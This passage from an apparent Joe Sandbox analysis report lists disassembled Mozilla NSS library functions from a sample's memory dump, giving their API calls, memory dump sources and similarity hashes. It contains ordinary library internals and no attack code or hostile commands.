                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C765EC0,00000000,?,?), ref: 6C765CBE
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C765CD7
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C765CF0
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C765D09
                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C765EC0,00000000,?,?), ref: 6C765D1F
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C765D3C
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765D51
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C765D66
                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C765D80
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strncmp$SecureStrdup_Util
                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                              • API String ID: 1171493939-3017051476
                                                                                                                                              • Opcode ID: 0656853923052c7fae27e765aae91399a76000cbac106088fdd26c00461e82c0
                                                                                                                                              • Instruction ID: 506782f47e47f06acbe81903d69907ddcaada5a6c49d00d6120b605a568bb298
                                                                                                                                              • Opcode Fuzzy Hash: 0656853923052c7fae27e765aae91399a76000cbac106088fdd26c00461e82c0
                                                                                                                                              • Instruction Fuzzy Hash: B03124F07013016BF7A11A26EE8AB663768AF0234CF100430ED55A6FC3E7B5D401DAD5
                                                                                                                                              Function 6C766CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C831DE0,?), ref: 6C766CFE
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C766D26
                                                                                                                                              • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C766D70
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000480), ref: 6C766D82
                                                                                                                                              • DER_GetInteger_Util.NSS3(?), ref: 6C766DA2
                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C766DD8
                                                                                                                                              • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C766E60
                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C766F19
                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6C766F2D
                                                                                                                                              • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C766F7B
                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C767011
                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6C767033
                                                                                                                                              • free.MOZGLUE(?), ref: 6C76703F
                                                                                                                                              • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C767060
                                                                                                                                              • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C767087
                                                                                                                                              • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7670AF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2108637330-0
                                                                                                                                              • Opcode ID: 4e75a3662afee719bbbc03ee8ce2ef46331df9e35e4a63af6c3ea9d1ea724146
                                                                                                                                              • Instruction ID: 15695182e0a551636965d1327cba3d7b646bb0e24c1bfa7638be84504bee2bfe
                                                                                                                                              • Opcode Fuzzy Hash: 4e75a3662afee719bbbc03ee8ce2ef46331df9e35e4a63af6c3ea9d1ea724146
                                                                                                                                              • Instruction Fuzzy Hash: 0EA13B719042009BEB009F26CF59BAB3295EB8130CF648939ED58CBF81E775DA49C793
                                                                                                                                              Function 6C722C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(#?rl,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C62
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C76
                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C86
                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722C93
                                                                                                                                                • Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
                                                                                                                                                • Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722CC6
                                                                                                                                              • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23,?), ref: 6C722CDA
                                                                                                                                              • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?,?,6C723F23), ref: 6C722CEA
                                                                                                                                              • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?), ref: 6C722CF7
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C71E477,?,?,?,00000001,00000000,?), ref: 6C722D4D
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C722D61
                                                                                                                                              • PL_HashTableLookup.NSS3(?,?), ref: 6C722D71
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C722D7E
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
                                                                                                                                                • Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
                                                                                                                                                • Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                              • String ID: #?rl
                                                                                                                                              • API String ID: 2446853827-3858320230
                                                                                                                                              • Opcode ID: 81fa02d3991c16a73ad500a9470deba3c6bbbebbb25dfb94b57c1b52be787219
                                                                                                                                              • Instruction ID: 6bde899d170c55d1eb8b69236df32dc17ad8e1285490f1eb3fc08e67014bf11c
                                                                                                                                              • Opcode Fuzzy Hash: 81fa02d3991c16a73ad500a9470deba3c6bbbebbb25dfb94b57c1b52be787219
                                                                                                                                              • Instruction Fuzzy Hash: ED5118B6D00105ABDB109F24DD498AAB7B8FF1936CB188530EC1897B12E735ED65CBE1
                                                                                                                                              Function 6C77AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77ADB1
                                                                                                                                                • Part of subcall function 6C75BE30: SECOID_FindOID_Util.NSS3(6C71311B,00000000,?,6C71311B,?), ref: 6C75BE44
                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C77ADF4
                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C77AE08
                                                                                                                                                • Part of subcall function 6C75B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8318D0,?), ref: 6C75B095
                                                                                                                                              • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C77AE25
                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C77AE63
                                                                                                                                              • PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C77AE4D
                                                                                                                                                • Part of subcall function 6C684C70: TlsGetValue.KERNEL32(?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684C97
                                                                                                                                                • Part of subcall function 6C684C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CB0
                                                                                                                                                • Part of subcall function 6C684C70: PR_Unlock.NSS3(?,?,?,?,?,6C683921,6C8614E4,6C7CCC70), ref: 6C684CC9
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77AE93
                                                                                                                                              • PR_CallOnce.NSS3(6C862AA4,6C7612D0), ref: 6C77AECC
                                                                                                                                              • PL_FreeArenaPool.NSS3 ref: 6C77AEDE
                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C77AEE6
                                                                                                                                              • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C77AEF5
                                                                                                                                              • PL_FinishArenaPool.NSS3 ref: 6C77AF16
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                              • String ID: security
                                                                                                                                              • API String ID: 3441714441-3315324353
                                                                                                                                              • Opcode ID: 47f78138e519e5a63728c0442528aca258328ee6e26b23ed04b45b6de50e89f8
                                                                                                                                              • Instruction ID: f1ca5f62e63362efbbfcefc0f4f31e0a639e24252ae5fceb298aa0420b2019bb
                                                                                                                                              • Opcode Fuzzy Hash: 47f78138e519e5a63728c0442528aca258328ee6e26b23ed04b45b6de50e89f8
                                                                                                                                              • Instruction Fuzzy Hash: 664126B1904208A7FF315B159E4EBAA32ACAF5232DF541635E81492F41FB75D60886F3
                                                                                                                                              Function 6C795CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C792BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792BF0
                                                                                                                                                • Part of subcall function 6C792BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792C07
                                                                                                                                                • Part of subcall function 6C792BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792C1E
                                                                                                                                                • Part of subcall function 6C792BE0: free.MOZGLUE(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792C4A
                                                                                                                                              • free.MOZGLUE(?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D0F
                                                                                                                                              • free.MOZGLUE(?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D4E
                                                                                                                                              • free.MOZGLUE(?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D62
                                                                                                                                              • free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D85
                                                                                                                                              • free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D99
                                                                                                                                              • free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795DFA
                                                                                                                                              • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795E33
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C795E3E
                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C795E47
                                                                                                                                              • free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795E60
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C795E78
                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6C79AAD4), ref: 6C795EB9
                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,6C79AAD4), ref: 6C795EF0
                                                                                                                                              • SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C795F3D
                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C795F4B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4273776295-0
                                                                                                                                              • Opcode ID: 8b006ca9e21f51af4f63f5db5a8c5c91a22afffbc3f4d81a92174a4e84635217
                                                                                                                                              • Instruction ID: 0b2950ab3b2628d9b8df0c7511c7738c246d28147aabce8c2e647c0f64a1e4c0
                                                                                                                                              • Opcode Fuzzy Hash: 8b006ca9e21f51af4f63f5db5a8c5c91a22afffbc3f4d81a92174a4e84635217
                                                                                                                                              • Instruction Fuzzy Hash: C371C2B4A00B009FD751CF20E989A92B7B5FF89309F148638E85E87B11E732F915CB91
                                                                                                                                              Function 6C718DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(?,?), ref: 6C718E22
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C718E36
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C718E4F
                                                                                                                                              • calloc.MOZGLUE(00000001,?,?,?), ref: 6C718E78
                                                                                                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C718E9B
                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C718EAC
                                                                                                                                              • PL_ArenaAllocate.NSS3(?,?), ref: 6C718EDE
                                                                                                                                              • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C718EF0
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C718F00
                                                                                                                                              • free.MOZGLUE(?), ref: 6C718F0E
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C718F39
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C718F4A
                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6C718F5B
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C718F72
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C718F82
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1569127702-0
                                                                                                                                              • Opcode ID: 042b207c13e51a2fdb9bae6ad52acbc1078f5ea72b612f30547a99bc21f07fed
                                                                                                                                              • Instruction ID: 7febcb0046aabc4f92cb833f9eec63656a799f4ad942e7bde7ee903c27cd265b
                                                                                                                                              • Opcode Fuzzy Hash: 042b207c13e51a2fdb9bae6ad52acbc1078f5ea72b612f30547a99bc21f07fed
                                                                                                                                              • Instruction Fuzzy Hash: 2A5106B2D042059FE7108E68CD849AAB7B9EF45318F1A4539EC089BF00E731ED4587D1
                                                                                                                                              Function 6C68DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C68DD56
                                                                                                                                              • memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C68DD7C
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C68DE67
                                                                                                                                              • memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C68DEC4
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68DECD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$_byteswap_ulong
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 2339628231-598938438
                                                                                                                                              • Opcode ID: aaa8987bbb4e519171f223746a229fd2ff9b189740c24443176d41d9c9642208
                                                                                                                                              • Instruction ID: 71490a6ea7a00de47fcafa1378a9ff52706f4575af5b555b202b7c3e9a566528
                                                                                                                                              • Opcode Fuzzy Hash: aaa8987bbb4e519171f223746a229fd2ff9b189740c24443176d41d9c9642208
                                                                                                                                              • Instruction Fuzzy Hash: DAA1F7716052129FC710DF29C880A6BB7F5EF85318F15896EF8899BB41D730E845CBB5
                                                                                                                                              Function 6C74EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6C74EE0B
                                                                                                                                                • Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
                                                                                                                                                • Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74EEE1
                                                                                                                                                • Part of subcall function 6C741D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C741D7E
                                                                                                                                                • Part of subcall function 6C741D50: EnterCriticalSection.KERNEL32(?), ref: 6C741D8E
                                                                                                                                                • Part of subcall function 6C741D50: PR_Unlock.NSS3(?), ref: 6C741DD3
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C74EE51
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C74EE65
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C74EEA2
                                                                                                                                              • free.MOZGLUE(?), ref: 6C74EEBB
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C74EED0
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C74EF48
                                                                                                                                              • free.MOZGLUE(?), ref: 6C74EF68
                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C74EF7D
                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6C74EFA4
                                                                                                                                              • free.MOZGLUE(?), ref: 6C74EFDA
                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C74F055
                                                                                                                                              • free.MOZGLUE(?), ref: 6C74F060
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2524771861-0
                                                                                                                                              • Opcode ID: 76af56d94e40bd125f257b366ce72d627382f26af8949997be2abb77a6d77ec7
                                                                                                                                              • Instruction ID: 2dd6011ae373733a7db56b31d6e41587ab6e60ed76628556b97b019cb0f0f081
                                                                                                                                              • Opcode Fuzzy Hash: 76af56d94e40bd125f257b366ce72d627382f26af8949997be2abb77a6d77ec7
                                                                                                                                              • Instruction Fuzzy Hash: 23818475A00219ABEB40DFA5DD49EDEBBB9BF08318F544034E909A3611E731E924CBE1
                                                                                                                                              Function 6C714CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
